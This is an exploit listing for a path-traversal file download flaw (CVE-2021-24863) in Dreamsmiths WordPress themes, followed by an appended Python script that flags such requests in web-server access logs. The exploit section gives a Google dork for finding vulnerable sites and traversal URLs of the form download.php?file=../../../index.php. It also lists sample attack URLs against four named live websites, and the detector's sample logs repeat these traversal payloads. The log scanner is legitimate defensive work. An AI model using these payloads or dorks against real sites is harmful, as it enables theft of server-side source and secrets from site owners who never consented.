WordPress Dreamsmiths Themes 0.0.1 Arbitrary File Download

CVE: CVE-2021-24863
Category: CWE-22
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-08-18
CPE: cpe:cpe:/a:wordpress:dreamsmiths_themes:0.0.1
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.021
EPSSP: 0.989


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080122

Below is a copy:

WordPress Dreamsmiths Themes 0.0.1 Arbitrary File Download
# Exploit Title: WordPress Dreamsmiths Themes Arbitrary File Download
# Google Dork: inurl:/wp-content/themes/fiestaresidences/ inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/
# Date: 2018/01/08
# Exploit Author: IRaNHaCK Security Team
# Vendor Homepage: iranhack.com
# Software Link: http://www.dreamsmiths.com/
# Version: 0.0.1
# Tested on: 7, Kali




P0c:

Arbitrary PHP file download in all WordPress themes by dreamsmiths:
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php

Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
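
A defender-side check for the request pattern in the advisory above, added here as an example and not part of the original advisory or the themes' code: it scans web-server access logs (assumed to be in Combined Log Format) for `download.php?file=` requests that carry traversal sequences or ask for server-side source. The function names, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Handler path named in the advisory: /wp-content/themes/<theme>/download.php
HANDLER = re.compile(r"^/wp-content/themes/[^/]+/download\.php$", re.I)
# Combined Log Format (assumed): client ... "METHOD target PROTO" status
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e), bounded to a few rounds."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target):
    """Return a reason if the request target abuses download.php, else None."""
    parts = urlsplit(target)
    if not HANDLER.match(decode_fully(parts.path)):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("file", []):
        name = decode_fully(raw).replace("\\", "/")
        if "\x00" in name:
            return "null byte"
        if ".." in name.split("/"):
            return "path traversal"
        if name.startswith("/"):
            return "absolute path"
        if name.lower().endswith((".php", ".phtml", ".inc")):
            return "server-side source requested"
    return None

def scan(lines):
    """Return (client, target, status, reason) for each suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        reason = classify(m.group(2)) if m else None
        if reason:
            hits.append((m.group(1), m.group(2), int(m.group(3)), reason))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Aug/2018:10:00:00 +0000] "GET /wp-content/themes/hsv/download.php?file=../../../index.php HTTP/1.1" 200 412',
    '203.0.113.7 - - [18/Aug/2018:10:00:02 +0000] "GET /wp-content/themes/optimus/download.php?file=%252e%252e%252findex.php HTTP/1.1" 200 3120',
    '198.51.100.4 - - [18/Aug/2018:10:01:00 +0000] "GET /wp-content/themes/erinvale/download.php?file=brochure.pdf HTTP/1.1" 200 88211',
    '198.51.100.9 - - [18/Aug/2018:10:02:00 +0000] "GET /wp-content/themes/hsv/download.php?file=download.php HTTP/1.1" 200 950',
]
```

`scan(SAMPLE_LOG)` flags the first, second and fourth lines; a hit logged with status 200 means the handler answered the request and the returned file should be treated as disclosed.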
